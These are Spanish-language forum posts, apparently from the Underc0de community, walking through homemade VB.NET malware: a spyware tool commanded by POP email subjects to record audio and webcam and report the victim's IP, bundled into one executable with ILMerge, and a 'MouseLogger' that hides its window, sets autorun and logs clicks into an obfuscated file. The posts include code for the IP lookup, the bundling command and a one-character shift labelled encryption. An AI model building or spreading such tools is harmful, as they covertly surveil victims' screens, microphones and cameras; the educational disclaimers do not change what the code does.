    Public Tiempo_Verificacion_POP As Integer = 6 'intervalo de 6 minutos para la consulta POP
#End Region

no debe ser mayor al numero de grabación ( en la siguiente version lo solucionare), para la grabación debe ser de la siguiente manera:

"1" es el tiempo de grabación si deseamos que grabe 2 minutos pero sin llegar a serl el valor de la consulta pop, seria: RecAudio 2 (esto debe ir en asunto)

Como vemos esta line de código

    Public Function GETIP()
        Dim req As HttpWebRequest = WebRequest.Create("http://localhost/myIp.php")
        Dim res As HttpWebResponse = req.GetResponse()
        Dim Stream As IO.Stream = res.GetResponseStream()
        Dim sr As StreamReader = New StreamReader(Stream)
        Return (sr.ReadToEnd())

    End Function

que se encuetra en

 Module Systeminfo

debemos subir un archivo para lograr dicha consulta de manera que nos arroje la ip para ello lo subimos a cualquier hosting.


que se encuentra en:
Ya que el programa necesitas dll para el POP y la WebCam.


Tenemos que fusionarlos (unirlos con el exe) para así tengamos solo un archivo. Para ello será necesario de una tools muy buena ILMerge.
1.- Llevamos a una carpeta los 3 dll mas el exe y un el archivo bat (el cual dejare el link).


2.- Luego vamos a la consola y nos vamos a la ubicación de la carpeta, colocamos lo siguiente.



Seguido nos mostrara el archivo unido.

El archivo bat

C:\Users\Code\Desktop\Underc0de\ILMerge.exe /target:Winexe /out:underC0de2.exe underc0de.exe OpenPop.dll AForge.Video.DirectShow.dll AForge.Video.dll

Link de Codigo Fuente Underc0de.malware.exe :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link del Decryter No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link de ILMergeNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link de myIp.php No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.


Ya que se enceuntra en la version alfa podria tener algunos errores. Pero por el momento lo he testeado en Win7 y XP (corre de maravilla).

Al ordenar mis FILES me tope con un PDF que tenia guardado por ahi y se me ocurrio compartilos con la comunidad underc0de...


Link de Descarga No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un pequeño artículo que decidi compartirlo con la comunidad underc0de.
Antes de empenzar la guía sera el Pseudocódigo.



Y los que no lo conocen, se requerira los  siguiente:
PASO 1
Ya que el programa está en .Net usaremos Win, lo primero sera capturar el proceso del Tasklist primero leer nombre del *.exe que está corriendo mediante un bucle.


PASO 2
La aplicación empezara a correr y se capturara en un *.txt debidamente encriptado con cada click hecho.



PASO 3
Luego del envió en el que solo se verá coordenadas en las que se hizo el click cada, una vez ello debemos desencriptarlo



PASO 4
Luego las coordenadas las llevaremos a una aplicación la cual las interpretara el tamaño de la pantalla y luego dibujara las coordenadas en una Form semi transparente.


PASO 5
Detrás del From estará delante la pagina web en la que se capturo el cursor y cada punto será un click .




[/b]

En este caso fue ensamblado con el Net Framework 3.5, así que el proyecto debe estar usando dicha versión por lo que al momento de crear el Form debe colocar Net Framework 3.5.


En el Form se encuentra lo siguiente:

• (1) ListView
      (4) Label
      (3) TextBox
      (1) RichTextBox
      (6) Timer

En el Solution Explorer se encuentra lo siguiente:


En cual se encontrara 11 Module y 1 Form. En cada línea de código se encuentra un comentario para así facilitar la comprensión del proceso.  Al momento de cambiar las propiedades del Form uno debe darse cuenta de que propiedades ha cambiado en especial ShowinTaskBar, Opacity además encontrara un Timer_Hide el cual hará de que el form pase oculto sin olvidarse del Autorun.

Lo única desventaja es que consume un 8% del procesador en mi caso Intel Core I3, se ha solucionado algunos fallos, pero si es que se encuentra alguno por favor deje su comentario y en breve se solucionara.

Descarga del Proyecto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



[/b]
Es el turno de implementar de decrypted y el form que nos mostrara los puntos en el que se hizo click. Lo explikare no es nada del otro mundo para quien ya tiene idea de programación para los que no ahi va:

Este es el código es del encrypted.

Public Sub encrypted ()
Dim cadena, i As String
Dim inicio As Integer
cadena = Convert.ToString(TextBox.Text)
For inicio = 1 To Len(cadena)
i = i + Chr(Asc(Mid(cadena, inicio, 1)) + 1)
'Mid lo que hace es reemplazar por el siguiente caracter
TextBox.Text = i
Next
End Sub

Se convierte en String el texbox y se aloja en la variabale cadena. En este caso se uso el contador de variable

Len(que nos arroja el numero de caracteres que tiene la cadena de texto incluido los espacios).

Seguido del Forn que haremos un conjunto de repeticiones del el c que este caso inicio tomo valor de 1 hasta el numero de caracteres que tiene el TextBox.

Mid es el que arrojara la cantidad de caracteres que nosotros especificaremosDim palabra As String = "Root Security"

Dim recorte As String = Mid(palabra,1,4)
'Siendo el resultado de esta linea de codigo la palabra "ROOT".

Mid(cadena, inicio,1) recorrerá toda la cadena del TextBox y empezará desde 1,1 esto nos dará referencia que en la primera repetición solo tomara al primer carácter.

Asc  (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) es la función que nos devuelve el código del carácter, por ejemplo la letra R es el código ASCI 82 lo que hace después de obtener la letra por medio del Mid la convierte con código ASCI y seguido le aumenta 1 en otras palabras si se obtuvo R que era = a 82 aumentara 1 y se volverá 83.

Chr es la función que  devuelve el código en carácter en el caso anterior que escogimos R y nos arrojo 82, esta función obtendrá "R" desde 82.Dim palabra As String = Chr(82) ' la cual nos devolverá la letra R.Pero en el encriptado al momento de aumentarle 1 al ASC se convierte en 83 y cuando se utiliza la función Chr(83) nos mostrara el carácter "S".

Y así continuamente para cada carácter.

En cambio el código de decrypted:

Public Sub decrypted ()
Dim cadena, i As String
Dim inicio As Integer
cadena = Convert.ToString(TextBox.Text)
For inicio = 1 To Len(cadena)
i = i + Chr(Asc(Mid(cadena, inicio, 1)) - 1)
'En este caso se quitara -1 carácter
TextBox.Text = i
Next
End Sub

Se usa las mismas funciones que el anterior con el cambio de que ahora no se aumentara si no se le disminuirá -1.

Ahora nos vamos al Form que nos mostrara los puntos en el cuales se hizo click como ya sabemos que proceso se hizo click solo debemos colocar la ventana de dicho proceso de tras del from transparente.

En el Form semitransparente en el cual se dibujara en las coordenadas que uno ingresa desde el textbox, la coordenada (0,0) es la de la esquina superior izquierda llegando a la coordenada que en mi laptop es la de (1366,768) esquina inferior derecha.

Descargar código fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descargar ejecutable: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


AVISO LEGAL
===========
MouseLogger es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que ocasiona el malware al infectar al ordenador.
No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco no me hago responsable de las copias del proyecto que sean distribuidas a través de otros portales web o usuarios y que puedan haber sido modificadas con intenciones dudosas.